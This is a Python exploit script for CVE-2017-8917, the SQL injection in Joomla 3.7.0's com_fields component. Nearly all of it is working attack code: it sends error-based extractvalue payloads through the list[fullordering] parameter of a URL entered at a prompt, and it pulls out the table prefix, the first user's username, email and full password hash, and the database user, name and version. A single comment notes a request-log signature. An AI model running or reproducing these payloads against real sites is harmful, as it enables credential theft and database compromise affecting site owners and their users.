        # Exploit Joomla 3.7.0 'com_fields' SQL Injection
    # CVE : CVE-2017-8917
    # Author :  SiopySh <[email protected]>
    
    import requests
    from bs4 import BeautifulSoup
    from art import *
    
    # Banner printed before any request is sent.
    print("Joomla CVE")
    print("--- Version : Joomla 3.7.0 ---")
    print("--- Date : 05/27/2021 ---")
    print("--- CVE : CVE-2017-8917 ---")
    print("--- Exploit Author : SiopySh <[email protected]> - Twitter @siopysh ---")
    print(" ")
    
    # Base URL of the site, read interactively and concatenated as-is below,
    # so it has to end with "/" (as in the example) for the path to resolve.
    ip = input("URL (ex: http://10.10.10.10/) : ")
    
    # Injection point: the com_fields list[fullordering] request parameter
    # (CVE-2017-8917, corrected in Joomla 3.7.1). Each payload string in this
    # script is appended directly to this value.
    # Detection note: a list[fullordering] value containing SQL function calls
    # (e.g. extractvalue( or information_schema) is the request-log signature.
    url = ip + "index.php?option=com_fields&view=fields&layout=modal&list[fullordering]="
    
    def processPayload(payload: str) -> str:
    	"""Send one injected ordering value and return the text echoed between `~~~`.

    	Every payload in this script wraps the selected value in 0x7e7e7e ("~~~"),
    	so the first <blockquote> of the returned page is expected to contain
    	~~~value~~~; element [1] of the split is that value.

    	Args:
    	    payload: SQL fragment appended to the module-level `url`.

    	Returns:
    	    The text between the first pair of `~~~` markers.

    	Raises:
    	    IndexError: if the page has no <blockquote> or the markers are absent.
    	"""
    	page = requests.get(url+payload)
    	soup = BeautifulSoup(page.text, 'html.parser')
    	response = soup.find_all('blockquote')[0].get_text().split('~~~')[1]
    	return response
    
    print(" ")
    # Table-prefix discovery: the first information_schema.tables row for the
    # current database is returned hex-encoded; after decoding, the part before
    # the first "_" is the configured Joomla table prefix used to name
    # {prefix}_users in the queries that follow.
    prefix: str = processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,hex(table_name),0x7e7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1)))=1")
    prefix = bytes.fromhex(prefix).decode('utf-8').split('_')[0]
    print("* Database prefix : " + prefix)
    # First 20 characters of username and email from the first {prefix}_users row.
    print("* Joomla user : " + processPayload(f"1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/{prefix}_users/**/limit/**/0,1)))=1"))
    print("* Joomla user mail : " + processPayload(f"1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/{prefix}_users/**/limit/**/0,1)))=1"))
    
    # Password column of the first {prefix}_users row, read 10 characters per
    # request (substring(password, index, 10)) until an empty chunk is returned.
    # The loop body repeats the fetch-and-parse steps of processPayload() inline.
    searchpassword: bool = True
    password: str = ""
    index: int = 1
    
    while(searchpassword):
    	payload_password = f"1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,{index},10),0x7e7e7e)/**/from/**/{prefix}_users/**/limit/**/0,1)))=1"
    	page = requests.get(url+payload_password)
    	soup = BeautifulSoup(page.text, 'html.parser')
    	response = soup.find_all('blockquote')[0].get_text().split('~~~')[1]
    	if(response == ""):
    		# No more characters: stop.
    		searchpassword = False
    	else:
    		password += response
    		index+=10
    print("* Joomla user password : " + password)
    
    # Server-side identity: first 20 characters of user(), database() and version().
    print("* Database user : " + processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1"))
    print("* Database name : " + processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1"))
    print("* Database version : " + processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1"))
    